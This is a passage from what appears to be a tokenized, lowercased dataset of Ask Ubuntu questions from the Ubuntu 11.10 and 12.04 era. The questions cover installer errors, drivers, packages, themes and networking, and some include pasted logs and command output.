, in __call__ file `` \lib\wubi\backends\common\utils.py '' , line 202 , in copy_file ioerror : [ errno 13 ] permission denied 03-29 20:34 debug tasklist : # cancelling tasklist 03-29 20:34 debug tasklist : new task check_iso 03-29 20:34 error root : [ errno 13 ] permission denied traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 130 , in select_task file `` \lib\wubi\application.py '' , line 205 , in run_cd_menu file `` \lib\wubi\application.py '' , line 120 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\utils.py '' , line 202 , in copy_file ioerror : [ errno 13 ] permission denied 03-29 20:34 error tasklist : 'windowsbackend ' object has no attribute 'iso_path' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 579 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 565 , in use_iso attributeerror : 'windowsbackend ' object has no attribute 'iso_path' 03-29 20:34 debug tasklist : # cancelling tasklist 03-29 20:34 debug tasklist : # finished tasklist i have no idea what 's the problem is . i 'm a kind of newbie . i 'm using win7 64bit , and installing as an administrator . please help me out !
117077	ntfs access very slow , perhaps a hang	i installed ubuntu 11.10 about a month ago . very nice . i dual boot it with windows and have run it on virtualbox . i hope to transition from windows to linux this year . i have many files in various ntfs partitions on multiple drives . they all show up and look right . however , today while browsing the files i ran into a problem . i opened a 278gb ntfs partition that contains many pictures and videos in various folders . when i went to a subfolder containing 48675 files , the app window showed the first n entries but became unresponsive so that i could not scroll . i was in `` list '' view and could see in the `` size '' column that for some of folders it said `` nnnn entries '' . for others it said `` ... '' or something like that . while i watched one of the folder size fields changed from `` ... '' to `` 2716 entries '' . it seemed that the file viewer app was looking at every file directory entry on this logical drive and doing so very slowly . i waited 10 minutes . i went to close the window but ubuntu said it was not responding and asked me if i want to force it to close . i cancelled the close , and instead minimized the window . when i tried to reopen it a minute later it would not open . i then shut down and noticed that during shutdown there was a brief error message mentioning error/interrupt # 15 . back in windows , i ran a check of that drive partition . no errors were found . it is fully defragmented . in windows i can navigate the files on that drive very quickly . can anyone suggest a fix ? this could be a showstopper for my migration to linux . tia for any help .
117088	aptitude safe-upgrade equivalence with apt-get	is there an equivalent to doing aptitude safe-upgrade using apt-get ?
117091	how do i install modelsim6.5f ?	the following errors are occuring while installing modelsim6.5f in ubuntu11.10 sudo apt-get install install.linux which results in reading package lists ... done building dependency tree reading state information ... done e : unable to locate package install.linux e : could n't find any package by regex 'install.linux'
117100	pen drive unmounts and remounts as readonly	when i plug in my usb pen drive , it is automatically mounted as read/write , as expected . however , after a random time it suddenly gets unmounted and remounted as read-only . a part from waiting for this annoying bug to be fixed , is there a workaround to prevent this from happening ?
117119	can not find a safe socket path in '/tmp '	a while ago i accidentally ran chmod 777 / , and stopped it as soon as i realized what i had done . unfortunately , it must have gotten to my /tmp directory , because whenever i start to run firefox now , this is the error i get : ** error ** : can not find a safe socket path in '/tmp' trace/breakpoint trap i ca n't find much information on the internet about this problem , and i 've tried uninstalling and reinstalling firefox - but nothing helped . how can i provide a `` safe socket path in '/tmp ' '' for firefox ?
117121	can i change the `` workspace switcher '' behavior to be `` window spread '' ?	i only use one workspace , but i do n't know how to reduce it to one . that being said , i would like to know how i can change the `` workspace switcher '' behavior . i 'd like to see the same thing as i see when i press super+ w , when i click on it .
117123	every apt-get install returns flashplugin error , but install works	i have recently installed ubuntu 11.10 using wubi . i am now still in the process of installing my development environments . i have seen the following error occur multiple times . for example , just now i wanted to install vim using the commmand sudo apt-get install vim . the following error is returned : fehler traten auf beim bearbeiten von : ( `` errors were encountered while processing : '' [ via google translate ] ) flashplugin-downloader : i386 flashplugin-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the install seems to have completed and i can now use vim . still , i would like to know what this error is and how i can fix it .
117127	flash video appears blue	the problem after updating to ubuntu 12.04 from ubuntu 11.10 , all video is still blue , whether playing in a browser or a player . same problem occurs in 11.10 as well . i have tried to uninstall all flash and re-installed but it makes no difference . what is causing the blue flash video ? ubuntu 11.10 64bit ubuntu 12.04lts 64bit what it looks like
117129	how do i make my application startable from the terminal ?	i 've created several python applications wherefore i know how to create a deb and how to push an application into my ppa in launchpad . what i never found out is how to make the application startable from the terminal by just entering its name like you use to do with any other linux application . i guess that i have to create a link to the application 's shell script in /usr/bin/ but i do n't know how to do this in my rules file which looks like this : # ! /usr/bin/make -f # -*- makefile -*- % : dh $ @ override_dh_install : dh_install nota/* /usr/share/nota/ dh_install applications/nota.desktop /usr/share/applications/
117130	how to include a screenshot of my application in the deb/ppa to show it in software-center ?	i know how to create a deb and push it into my ppa at launchpad but i want to know how i can include a screenshot of the application that it shows up in software-center .
117131	update path in location-independent installation	i am trying to install root , using a location-independent installation . i 've come as far as step 2 . the next step is : add bin/ to path and lib/ to ld_library_path . i 've read in other questions that i need to edit .bashrc - is that correct ? what exactly do i need to put in there to manipulate these paths ? thank you !
117135	cli program to download album art	i 'd like to be able to do this : $ pwd /home/ $ user/music/ripped_music/monty_python-instant_record_collection $ ls 01.the_executive_intro.mp3 ... 16.the_lumberjack_song.mp3 $ mystery_command_or_script . $ ls 01.the_executive_intro.mp3 ... 16.the_lumberjack_song.mp3 album_cover.jpg $ somewhere in the guts of rhythmbox , totem , etc . this is being done . i 'd like to be able to do it myself . i do n't need help actually writing a script . i 'd really just like to know if there 's something like cddb for album covers . ( scraping albumart.org is the current working solution . )
117142	how ( if at all ) can i recover lost gnome settings after unclean shutdown ?	i had a power outage the other day and when i started ubuntu afterwards it told me that it found some errors on disk , fixed them and restarted . then i finally got to login and : i have all my regular files in my home directory i am missing all my gnome settings ( from wifi passkeys that were saved to desktop background to chrome profile ) my firefox retained all the settings [ can provide more symptoms , if that would help ] my home directory used to be encrypted , and following the steps here , i see it still is . i have tried restarting / logging in-out and once saw my wallpaper appear ( and then the session crashed ... ) . so i believe that the settings are still `` out-there '' . so , what can i check / how can i understand what exactly is my situation and whether ( and how ) i can recover all my settings ?
117143	command line tool to bulk extract images from a pdf ?	i have a pdf catalog that was given to me from a client in pdf format . they do n't have the images but they 're in the pdf . is there a way to extract all images from a pdf using a command line tool while preserving it 's original file names ? i reviewed this thread ( extract images from pdf with layer masks ) but this is for individual images .
117144	how do i show the applications lens by default ?	while i am growing to be more and more fond of unity , there are a few minor things i 'd like to change . one of them in which is the default view of the dash . when i go into the dash , 99 % of the time it 's after an application . i 'd really like to find a way to have the applications lens be the default one . is this possible in any way ? i just find it cumbersome to click the dash icon , bottom of the dash select the 2nd icon ( applications lens ) then select `` see more results '' to see all of them .
117146	why gparted do n't open ?	when i open gparted , the icon of gparted appear near cursor for 1 minute , but after that the icon disappears and gparted did n't open but when i run it on terminal with this instruction sudo gparted gparted opens immediately . i was had ubuntu 11.10 and recently installed kde on it .
117148	downgrading a ubuntu 10.04 lts virtual server	i am downgrading an existing ubuntu 10.04 lts virtual server to one with less memory and a smaller drive ( from 80gb to 40gb ) . my hoster ( hetzner.de ) does not give me the possibility of doing an inplace downgrade , so i have to create a new server . what is the best way to make an image of the first system and `` apply it '' to the new one ? i know there other answer but in my situation i am not sure i would be able to use clonezilla or other gui tools , because the installation is minimal with no gui . thanks in advance michele
117149	disabling / remapping logitech g400 mouse dpi buttons	i had the logitech mx-518 mouse , but it had been having issues with responsiveness , causing me to call support for a replacement . instead of another 518 , they sent me a logitech g400 mouse because the 518 has been discontinued . this causes issues because , while the mx518 was supported by lomoco , the g400 mouse is unsupported . running $ lomoco -s shows 001.003 : 046d : c245 unsupported logitech device : unknown . what i would like to do is lock the dpi of my mouse to a single value and remap the dpi+ and dpi- buttons to pgup and pgdn on my keyboard . how would i accomplish this ? the buttons are , in order : button 1 : left-click button 2 : middle-click button 3 : right-click button 4 : mouse wheel up button 5 : mouse wheel down button 6 : none button 7 : none button 8 : thumb button # 1 button 9 : thumb button # 2 button 10 : task switcher button button 11 : none button 12 : none on the previous mouse ( mx 518 ) , buttons 11 and 12 were the dpi keys . one of the things that makes these buttons different than the rest is that applications such as xev do not recognize pressing them as an event , by default . on the mx 518 mouse , in order to make those buttons able to be altered / binded , they had to first be disabled . i believe that lomoco called it `` logitech smartscroll / cruise control . '' on the g400 , lomoco does n't work and i am unaware of an alternative . also , here is some output from xinput , in case it is helpful . user @ localhost : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech gaming mouse g400 id=8 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=9 [ slave keyboard ( 3 ) ] user @ localhost : ~ $ xinput list-props 8 device 'logitech gaming mouse g400 ' : device enabled ( 121 ) : 1 coordinate transformation matrix ( 123 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 248 ) : 0 device accel constant deceleration ( 249 ) : 2.000000 device accel adaptive deceleration ( 250 ) : 1.000000 device accel velocity scaling ( 251 ) : 1.000000 device product id ( 238 ) : 1133 , 49733 device node ( 239 ) : `` /dev/input/event4 '' evdev axis inversion ( 252 ) : 0 , 0 evdev axes swap ( 254 ) : 0 axis labels ( 255 ) : `` rel x '' ( 131 ) , `` rel y '' ( 132 ) , `` rel vert wheel '' ( 247 ) button labels ( 256 ) : `` button left '' ( 124 ) , `` button middle '' ( 125 ) , `` button right '' ( 126 ) , `` button wheel up '' ( 127 ) , `` button wheel down '' ( 128 ) , `` button horiz wheel left '' ( 129 ) , `` button horiz wheel right '' ( 130 ) , `` button side '' ( 242 ) , `` button extra '' ( 243 ) , `` button forward '' ( 244 ) , `` button back '' ( 245 ) , `` button task '' ( 246 ) , `` button unknown '' ( 241 ) , `` button unknown '' ( 241 ) , `` button unknown '' ( 241 ) , `` button unknown '' ( 241 ) evdev middle button emulation ( 257 ) : 0 evdev middle button timeout ( 258 ) : 50 evdev third button emulation ( 259 ) : 0 evdev third button emulation timeout ( 260 ) : 1000 evdev third button emulation button ( 261 ) : 3 evdev third button emulation threshold ( 262 ) : 20 evdev wheel emulation ( 263 ) : 0 evdev wheel emulation axes ( 264 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 265 ) : 10 evdev wheel emulation timeout ( 266 ) : 200 evdev wheel emulation button ( 267 ) : 4 evdev drag lock buttons ( 268 ) : 0
117155	do i need to restore iptable rules everytime on boot ?	every time i reboot i loose the iptables rules that took me so looong to enter . i know i can save them and restore them on boot , but is there anyway to save them forever ? do i really need to restore them on boot every time ? seriously ? the problem is i have a huge list of ips in which i use a while loop to load them in . this can take upwards of 10 minutes . this is my home ftp server . it 's a small vm with 1gb ram and very little processing power . there are so many ips because i 've pretty much given up on the asian continent . i do n't need them to be hitting up my ftp server everyday with brute force . i also block gov . monitors , trackers and spammers . this is the while loop i use to load in the list . grep input block.list | while read lista ; do sudo iptables -a $ lista ; done
117157	is there a use case for `apt-get install` without `update` ?	every time i see instructions to run apt-get install , it says to run apt-get updatefirst . same for upgrade and dist-upgrade . why does n't install automatically do update ? is there a case where you do n't want that ?
117158	sharing my home folders with other users on the same pc	after reviewing similar questions on the same subject im still none the wiser . i want to share my music , pictures and video folders with other users on my pc . i am using 11.10 and will be upgrading to 12.04 . the method i have tried is to right click on the folder ( as administrator ) , select `` sharing options '' check all the necessary fields and give the share a name like `` music-shared '' . another dialog pops up then and i select `` set nautilus permissions '' . when the other user logs on they go to their home folder click on the network and can see the `` music-shared '' folder , but they get a message that the do not have the necessary permissions to view the content . im sure i 'm missing something simple . my home folder is encrypted and i am willing to unencrypt to make this work unlike other questions on this site , i dont have a partition etc . i would be grateful for any help .
117159	tab autocomplete in terminal is not behaving properly	there 's something odd about my autocomplete in the gnome terminal . i used to be able to type cp downtab to get cp downloads/ , and then type jettab to end up with cp downloads/jet\ pack\ instructions.pdf but now , when i have cp down typed and hit tab , i get cp downloads with a space afterwards . and if i backspace that and make it say cp downloads/jet and hit tab , i get cp downloads/jet pack instructions.pdf without the backslashes . it was n't like this before . how do i fix this ? edit : there 's a problem with my /etc/bash_completion file , it seems . just not sure what .
117161	how do i add a ubuntu countdown widget into a forum ?	i want to add this ubuntu countdown widget : http : //corbindavenport.com/ubuntu/ into a forum , ( in this case : http : //www.fxp.co.il/forumdisplay.php ? f=940 ) how can i do that ? when i just copy-paste , it 's only showing the code ...
117162	how do i reduce the size of mlocate database ?	i 'm out of space on /var 25g 25g 0 100 % /var it looks like mlocate.db is the problem : # find /var -printf ' % s % p\n ' | sort -nr | head 13140140032 ./lib/mlocate/mlocate.db.cglmam 12409839616 ./lib/mlocate/mlocate.db.mqgeqe # cat /etc/updatedb.conf prune_bind_mounts= '' yes '' prunenames= '' .git .bzr .hg .svn '' prunepaths= '' /tmp /var/spool /media '' prunefs= '' nfs nfs nfs4 rpc_pipefs afs binfmt_misc proc smbfs autofs iso9660 ncpfs coda devpts ftpfs devfs mfs shfs sysfs cifs lustre_lite tmpfs usbfs udf '' i do n't see anything else to prune . so how can i fix this ? thanks
117168	why does ubuntu unity only have 4 themes ?	why does ubuntu unity only have 4 themes to chooes ? ambiance , radiance and 2 high contrast-themes it would be so great if there would be more themes to choose thanx
117169	how can i disable grub from showing up ?	i just installed another os in my second partition . i know that it is expected for grub to show up when you 're dual-booting , but is it possible to disable that feature ? all i want is that grub shows up only if i press right-shift , just like when i had only ubuntu installed . thanks in advance .
117172	change the color orange of ambiance into another color ?	does anybody know how the change the color orange of ambiance into another color ? i hate orange ! do i have to change something in the file gtk.css ?
117175	switch hdd in laptop	the internal hard drive that i have right now in my laptop is coming near its death , clicking for life , so i decided to buy a new hdd . however , i do n't want to spend two weeks setting up my system to fit me as it does right now , so i thought that i can make just a hard copy of all the contents to the new disk ( using dd ) . my question is : is it going to work ? : - ) what are the things that need to be changed , except fstab ?
117178	how to maintain symlinks in linux file manager ?	i want to use symlinks extensively . however , if i move the target file , the symlink becomes broken ( unlike on windows ) . that 's not acceptable to me , so i either need a solution or i wo n't be able to use symlinks the way i wish to . is there a solution that will work with dolphin file manager ? a command line solution is described on commandlinefu . in summary , it is something like one of these : lmv ( ) { for a in $ { @ :1 : $ ( expr $ # -1 ) } ; do [ -e `` $ a '' -a -e `` $ { @ : $ # :1 } '' ] & & mv `` $ a '' ; '' $ { @ : $ # :1 } '' & & ln -s `` $ { @ : $ # :1 } '' / '' $ ( basename `` $ a '' ) '' ; '' $ ( dirname `` $ a '' ) '' ; done } lmv ( ) { for a in $ { @ :1 : $ ( expr $ # -1 ) } ; do [ -e `` $ a '' -a -e `` $ { @ : $ # } '' ] & & mv `` $ a '' ; '' $ { @ : $ # } '' & & ln -s `` $ { @ : $ # } '' / '' $ ( basename `` $ a '' ) '' ; '' $ ( dirname `` $ a '' ) '' ; done } but about half the time i 'm using a file manager ( dolphin ) , so i need a complete solution to this problem . is a solution available for a gui file manager ? edit : the context of this question is that i 'm searching for an alternative to hardlinks . i previously asked this question about the pitfalls of hardlinks .
117180	why is it not possible anymore to customize themes ?	in earlier releases of ubuntu , it was so easy to customize themes . you could change all the colors fast and easy . why is it not possible anymore ? ca n't they offer this option again ?
117183	i need help pleas help me xorg.conf missing ubuntu 11.10 ca n't install driver for my intel gm965 on my dell latitude d630	i have hard time solving my problem . i have searched the net but nothing worked ... i just installed the newest ver of ubuntu 11.10 on my laptop dell latitude d630 . everything works fine but it seems i dont have my video card drivers installed . i have some standart drivers . i try to check out my xorg.conf file but its missing i try to make one from root but it gives me critical error . its like i dont have x11 installed can some1 please help me here are some of the things ive tryed ... '' '' '' splash @ mdfc : / $ xorg :1 -configure fatal server error : can not open log file `` /var/log/xorg.1.log '' please consult the the x.org foundation support at http : //wiki.x.org for help . ddxsiggiveup : closing log '' '' '' splash @ mdfc : / $ sudo cp /root/xorg.conf.new /etc/x11/xorg.conf cp : can not stat `/root/xorg.conf.new ' : no such file or directory '' '' '' '' any ideas help me please ...
117186	restrict access to apache2 web root but allow it to subfolders	i need to restrict access by password to my web root apache test server ( ie http : //localhost ) but allow access to subfolders ( ie : http : //localhost/testsite ) i did create the .htpasswd and .htaccess , and put the .htaccess to web root ( http : //localhost ) so when trying to access web root , it asks for user and pass , but so does in subfolders ( ie : trying to access http : //localhost/testite ) i want to be asked for password on web root , but not on subfolders . is that possible ?
117189	apt-get install openjdk-7-jdk does n't install javac . why ?	the program 'javac ' can be found in the following packages : * openjdk-6-jdk * ecj * gcj-4.4-jdk * gcj-4.6-jdk * gcj-4.5-jdk * openjdk-7-jdk then i run sudo apt-get install openjdk-7-jdk and everything works . but then javac still does not exist and i get the same error as above . same thing with openjdk-6-jdk . why ?
117191	how to upgrade oracle jdk and remove old jdk settings	i searched and not found how to upgrade oracle jdk in here . i 'm not satisfied with openjdk7 because it does n't come with java compiler . i have installed and configured sun java sdk 6 and i want to upgrade to oracle jdk 7 . i searched ppa 's from launchpad an wubp8 but it did n't worked . how can i upgrade sun jdk 6 to oracle jdk 7 and also completely remove all sun jdk 6 settings ? i 'm very grateful for your answers .
117193	what happens when i drop a file on archive in nautilus ?	i had this file structure : 2000/ 001.txt 002.txt 003.txt ... 2001/ ... 2002/ ... ... 2011/ i guess file structure does n't matter , but anyway ... so folders are representing couple of years with some text files inside . now i compress all , with nautilus compress context menu ( archive manager ) in tar.gz format . i choose this format as although it requires more space then bz2 , it 's lot faster when i need to query data inside . after this i create helper text file with references about archive contents ( 170 kb in size ) and wanted to add it to archive , so i just drag & drop this file onto created archive in nautilus . two bad things happen : droping file onto archive extracts whole archive in temp folder then re-compresses all files again ! this is just awful for large archives , and i hope to find better way in terminal later initial archive was ~ 96 mb in size , and now just by adding this 170 kb text file , archive become 140 mb ! i checked inside it 's same content + this tiny text file why is this ? i just created archive with contents from two subfolders , than drag & drop file with size of 100 bytes : $ gzip -l tmp-original.tar.gz compressed uncompressed ratio uncompressed_name 13297512 69908480 81.0 % tmp-original.tar $ gzip -l tmp-updated.tar.gz compressed uncompressed ratio uncompressed_name 19231941 69908480 72.5 % tmp-updated.tar
117195	wireless woes ubuntu wo n't hook up to my built in hardware gateway laptop	i installed ubuntu on my lap top that runs winxp , i really like ubuntu and will probably get rid of windows all together , but ubuntu wo n't access my built in wirless or wi-fi . in windows i use broadcom . any ideas ?
117208	how to sync ubuntu one contacts with thunderbird ?	i 'm testing ubuntu 12.04 beta 2 . i ca n't find a way to sync my ubuntu one contacts with thunderbird . is it possible ?
117211	pc wo n't boot up after installing 11.10	i have a hp/compaq s1010z ( amd64 ) desktop and installed 11.10 from a cd ( using the entire disk ) . so it formatted the entire drive , went through installation and then it ejected the cd and asked me to click the restart button , which i did . it rebooted fine the first time , but any time thereafter , it fails . meaning , after the initial bios screen , the monitor seems to be stuck in limbo with a text cursor blinking on the top left corner , as if it ca n't find anything to boot from . at first i tried reinstalling ( reformat entire drive again ) - no improvement . then i did an in-place re-installation ( leave home dirs in place , just redo the os ) , nothing there either . then i put in the 11.04 cd , changed the boot order to cd first , and got the cd menu , chose 'boot from first hard disk ' and it booted fine . the problem is that i ca n't boot without the 11.04 cd , how ironic ! any ideas ?
117224	unknown file system : grub rescue	i have lenovo y560 laptop on which installed windows 7 and ubuntu 11.10 as dual boot . due to some reason i had to recover the boot loader using bootrec.exe /fixmbr and bootrec.exe /fix boot . it created one partition of size 198mb named `` tet '' and both ubuntu and windows were working fine . yesterday while making some changes in partition table i deleted that `` tets '' partition and after reboot im getting following error error : unknown filesystem grub rescue > i tried to boot from the windows installer cd and but it stucks at `` starting windows '' so i am not able to run the commands i have mentioned earlier and when i tried to boot from ubuntu 11.10 , it stuck at this error : memory full ca n't kill any more process . please help me out .
117230	unity 3d wo n't load - choosing `` ubuntu '' during login still loads unity 2d	i just installed ubuntu 11.10 on my asus n43sl laptop and unity 3d loaded right after installation . but upon reboot , i noticed that ubuntu loaded unity 2d instead of unity 3d . i logged-off and made sure i had `` ubuntu '' selected during login , but after many attempts unity 3d just wo n't load . just to make it definite , i did echo $ desktop_session on the terminal and it says ubuntu-2d , which is not expected . my laptop runs on i5 with 1gb nvidia gt540m so i do n't think its a case of lacking graphics capability . and yes , i have installed the proprietary driver using `` additional drivers '' in `` system settings '' . what can be the cause of this problem ? how can it be fixed ?
117233	imac install of ubuntu , wireless mouse and keyboard not recognized	'm trying to install 11.10 on my mid 2011 imac but it does n't seem to recognize my apple wireless keyboard or my magic mouse . they 're both bluetooth devices and they were recognized on windows 7 installation procedure on bootcamp . so the problem is that i get to setup program of ubuntu 11.10 but i just ca n't do anything at all since i just ca n't control my imac .
117235	is it possible to have .bashrc outside home directory ?	i want to put a .bashrc file in a directory where my application is located , to set up path variables accordingly independent of the location of the directory at the moment . at the same time , i want to be able to run the application right away , without having to source a shell file to set the path every time . therefore i figured i could use .bashrc which is executed when the non-login terminal is started . if i do put it in the proper .bashrc in the home directory , i would have to give an absolute path which i want to avoid . is there a way to have something like .bashrc but not in home directory ( ie a shell that is executed when terminal is started ? )
117247	how to execute a script when workspace changed ?	i use devilspie to arrange the windows of monitoring tools ( htop , ifop , iotop , nethogs , bmon ) at the third workspace . in case i need the details about some process activity , i switch to the third workspace and watch all i need immediately . it is very handful to me . but these tools consume resources of my week atom box which i want to be free when i do n't use the third desktop . that is why i 'm looking for a way to stop ( kill -stop ) these monitoring processes when i move from the third desktop and coninue them ( kill -cont ) when i come back . i figure out there might be a kind of hooks in de which trigger when desktops switch . i use lxde in lucid . any ideas ?
117252	cant see windows xp hard disk partitions in ubuntu10.04	i am new to linux and recently installed ubuntu 10.04 based on a vmware virtual machine at windows xp . when open ubuntu , left-clicking places- > desktop , i can see windows xp hard disk partitions and folds and files in them , but today i can not . any help will be appreciated . thanks in advance .
117261	foreign language keyboard layout	i have problem with right to left / left to right layout . some languages are in ( rtl ) layout so i can not type exactly what i want ! provide me some help to fix this issue , please !
117264	empathy auto accept group chat invite	i 'm using empathy 2.34.0 as chat client for account hosted on google app ( server talk.google.com ) . i 'm happy with the features that empathy provides and integration with google chat , however for group chat when the request is received i need to click on `` join '' button showed in popup to get started . this makes sense but i would to know if there is any way to automatically join the chat room without clicking the `` join '' button as i use it only with trusted uses . besides the messages shared after the invite request and before my entry to chat room is not accessible to me . i looked around the empathy settings but could n't find anything useful , wondering if i can get some help from here . thanks .
117267	backup mysql databases from broken ubuntu	here is my problem , and i hope someone would help me to find a solution . my ubuntu 12.04 is broken after an upgrade from 11.10 , it wo n't boot up , just stops at the purple ubuntu screen , but i can still acces partition via live usb . now i want to go back to the old 11.10 with an complete reinstall , but i have to backup some of my mysql databases from my broken system , is there an easy way to do this ? the help would be much appreciated .
117271	how do i add file and directory comparision option to mc user menu ?	i want to add beyond compare diff to mc ( midnight commmander ) user menu . all i know is that i need to add my custom command to ~/.mc/menu but i have no idea about the syntax to use . i want to be able to compare two files from the two panes or the directories themselves . the command that i need to run is bcompare file1 file2 & ( some for directories , it will figure it out ) .
117275	how to start application from command line without blocking but move the focus on it ?	i am trying to start a file compare application from the console by runnning bcompare ... & but this will start the application without activating it ( focus ) . is there a way to start it and switch to it ? i 'm looking for something similar to windows start command .
117277	how do i fix dragging windows to the adjacent workspace ?	i installed compizconfig-settings-manager and i put on all the settings i liked and had in 11.10 , including the ability to drag my windows to the adjacent workspace . it 's under the desktop wall section , on the edge flipping tab and i 've checked `` edge flip move '' and `` edge flip dnd . '' in 11.10 , the movement was smooth between each workspace , and the window would still be `` grabbed '' in the same place . in 12.04 , it 's leaving the window behind and the mouse appears to be `` grabbing '' nothing , but i 'm still holding onto the window , and i can still move and place it within the workspace ( or indeed the previous workspace as it wo n't appear in the desired place until i drag the mouse all the way to the edge of the screen ) . any way to fix this ? i 'm running 12.04 beta 2 .
117286	is new multi-monitor feature on 12.04 working with nvidia binary driver ?	i still ca n't use multi-monitor on 12.04 with nvidia binary driver . anyone has a workaround for this ? i know i can use nvidia settings using twinview but this has several disadvantages ( e.g . some apps see single big screen e.g . vnc server ) . edit : seems like it 's not possible since nvidia binary driver does not support anything above xrand 1.1
117291	how to turn on the integrated webcam ?	how do i turn on the integrated web-cam on dell vostro i have ubuntu 10.10
117294	how can i change the selected item colour gtk3 theme 's nautilus.css script ?	see in the image , selected item `` build '' colour is black as background colour . how can i change the selected item colour gtk3 theme 's nautilus.css script which section colour need to modify : /* desktop mode */ .nautilus-desktop.nautilus-canvas-item { color : @ bg_color ; text-shadow : 1 1 alpha ( # 001b33 , 0.8 ) ; } .nautilus-desktop.nautilus-canvas-item : active { background-image : none ; background-color : alpha ( @ selected_bg_color , 0.84 ) ; border-radius : 4 ; color : @ fg_color ; } .nautilus-desktop.nautilus-canvas-item : selected { background-image : none ; background-color : alpha ( @ bg_color , 0.84 ) ; border-radius : 4 ; color : @ selected_fg_color ; } .nautilus-desktop.nautilus-canvas-item : active , .nautilus-desktop.nautilus-canvas-item : prelight , .nautilus-desktop.nautilus-canvas-item : selected { text-shadow : none ; } /* browser window */ nautilustrashbar.info , nautilusxcontentbar.info , nautilussearchbar.info , nautilusqueryeditor.info { /* this background-color controls the symbolic icon in the entry */ background-color : mix ( @ fg_color , @ base_color , 0.3 ) ; border-radius : 0 ; border-style : solid ; border-width : 0 1 1 1 ; } nautilussearchbar .entry { } .nautilus-cluebar-label { color : @ fg_color ; font : bold ; } # nautilus-search-button * : active , # nautilus-search-button * : active : prelight { color : @ dark_fg_color ; } nautilusfloatingbar { background-color : @ info_bg_color ; border-radius : 3 3 0 0 ; border-style : solid ; border-width : 1 ; border-color : darker ( @ info_bg_color ) ; -unico-border-gradient : none ; } nautilusfloatingbar .button { -gtkbutton-image-spacing : 0 ; -gtkbutton-inner-border : 0 ; } /* sidebar */ nautiluswindow .sidebar , nautiluswindow .sidebar .view { background-color : @ bg_color ; color : @ fg_color ; } nautiluswindow .sidebar .frame { } nautiluswindow > gtktable > .pane-separator { background-color : @ bg_color ; border-color : @ bg_color ; border-width : 0 0 0 0 ; border-style : solid ; }
117298	can i install and use gps maps ?	can i install and use gps maps without gps chip or gps receiver on acer aspire ? if yes , how can i do this ? it will be welcome if it will be tom-tom maps or navitel maps .
117299	adjust the volume using the mouse wheel	please tell me how can i adjust the volume control with the help of ctrl + scroll up / ctrl + scroll down ? need a solution that would use notifyosd .
117300	ubuntu systematically losing wired connection	i 'm working on 11.10 for few recent days , everything was working perfect until today . updated ubuntu ( some certs were updates as far as i remember ) and from this time , wired network stops working randomly and systematically . ( all other pcs/macs work fine ) from 192.168.0.9 icmp_seq=25 destination host unreachable from 192.168.0.9 icmp_seq=26 destination host unreachable from 192.168.0.9 icmp_seq=27 destination host unreachable from 192.168.0.9 icmp_seq=28 destination host unreachable from 192.168.0.9 icmp_seq=29 destination host unreachable from 192.168.0.9 icmp_seq=30 destination host unreachable from 192.168.0.9 icmp_seq=31 destination host unreachable 64 bytes from 192.168.0.1 : icmp_req=32 ttl=64 time=1003 ms 64 bytes from 192.168.0.1 : icmp_req=33 ttl=64 time=0.496 ms 64 bytes from 192.168.0.1 : icmp_req=34 ttl=64 time=0.576 ms 64 bytes from 192.168.0.1 : icmp_req=35 ttl=64 time=0.522 ms 64 bytes from 192.168.0.1 : icmp_req=36 ttl=64 time=0.624 ms 64 bytes from 192.168.0.1 : icmp_req=37 ttl=64 time=0.625 ms 64 bytes from 192.168.0.1 : icmp_req=38 ttl=64 time=0.555 ms it 'll work for 20 seconds then it 'll stop working for 10-30sec and so on . i 've tried setting my router to give static ips , it does n't help . nothing has been changed since yesterday beside the package update ... here are other settings that may be useful : baka @ baka-pc : ~/private/projects/wduk $ lspci -nnk | grep -ia2 net 06:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : asustek computer inc. p8p67 and other motherboards [ 1043:8432 ] kernel driver in use : r8169 baka @ baka-pc : ~/private/projects/wduk $ ifconfig -a eth0 link encap : ethernet hwaddr **removed mac address** inet addr:192.168.0.9 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :ca60 : ff : fe0a:85b2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6400 errors:0 dropped:6400 overruns:0 frame:6400 tx packets:7085 errors:0 dropped:107 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4191983 ( 4.1 mb ) tx bytes:886881 ( 886.8 kb ) interrupt:72 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2522 errors:0 dropped:0 overruns:0 frame:0 tx packets:2522 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1070130 ( 1.0 mb ) tx bytes:1070130 ( 1.0 mb ) baka @ baka-pc : ~/private/projects/wduk $ cat /etc/resolv.conf # generated by networkmanager nameserver 8.8.8.8 thanks for help
